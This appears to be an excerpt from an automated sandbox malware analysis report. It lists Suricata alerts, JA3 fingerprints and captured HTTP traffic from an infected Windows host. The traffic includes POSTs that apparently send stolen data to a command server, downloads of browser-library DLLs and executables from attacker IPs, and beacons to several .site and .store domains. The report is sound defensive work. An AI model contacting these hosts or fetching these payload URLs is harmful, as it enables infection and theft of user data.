Source: Joe Sandbox View ASN Name: HETZNER-ASDE HETZNER-ASDE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49744 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49743 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49741 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49740 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49745 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49746 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49751 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49748 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49742 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49747 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49749 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49752 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49753 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49750 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49754 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49755 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49756 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49757 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49758 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49759 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49760 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49761 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49763 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49765 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49764 -> 147.45.44.104:80
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49768 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49771 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49773 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49775 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49780 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49781 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49782 -> 147.45.44.104:80
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49785 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49790 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49793 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49797 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49795 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49799 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49788 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49801 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49800 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49803 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49805 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49807 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49808 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49806 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49804 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49810 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49809 -> 49.12.197.9:443
Source: Network traffic Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49811 -> 49.12.197.9:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIEGHJJDGHCAKEBGIJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJEBAAECBGDHIECAKJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDHDBKEBGHJJJJKEHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHJEBGIEBFIJKEBFBFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFHJEBAAEBGDGDBFBGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 5497Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJKJDAFHJDHIEBGCFIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKJDBAAKJDGCBFHCFCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHDBGDHDAECBGDHJKFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGCGCFHIEHIDGDBAAEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJDGCGDAAAKECAKKJDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFCAAKFBAEHJJJJDHIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIEBAKEHDHCAKEBFBKEGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 114097Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFHDBFIDAECAAAKEGDAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDHJJJECFIECBGDGCAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: questionsmw.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: soldiefieop.site
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKEGDGCGDAKEBFIJECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: abnomalrkmu.site
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: treatynreit.site
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: snarlypagowo.site
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGCBAFCGDAAKFIDGIEGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mysterisop.site
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: absorptioniw.site
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gravvitywio.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: questionsmw.store
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: soldiefieop.site
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: abnomalrkmu.site
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCAAFHIEBKJKEBFIEHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: treatynreit.site
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: snarlypagowo.site
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHJJECBKKECFIEBGCAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mysterisop.site
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBFBFCBFBKECAAKJKFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: absorptioniw.site
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAFBAEBKKEBFIJEBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gravvitywio.store
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KECGDBFCBKFIDHIDHDHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 5485Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGIJECFIEBFIDHCGHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIJKJJKEBGHJKFIDGCAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFCFHJDBKKFHIEHIDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIEHJEBAAFIDHJEBGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 5437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECGHJDBFIJJJKEHCBFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ldms/66fbfcc9963ca_ldfsna.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ldms/66fbfccd837ac_vadggdsa.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /prog/66fbfcc301a31_swws.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCGHCBKFCFBFHIDHDBFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: cowod.hopto.orgContent-Length: 5757Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
Source: unknown TCP traffic detected without corresponding DNS query: 49.12.197.9
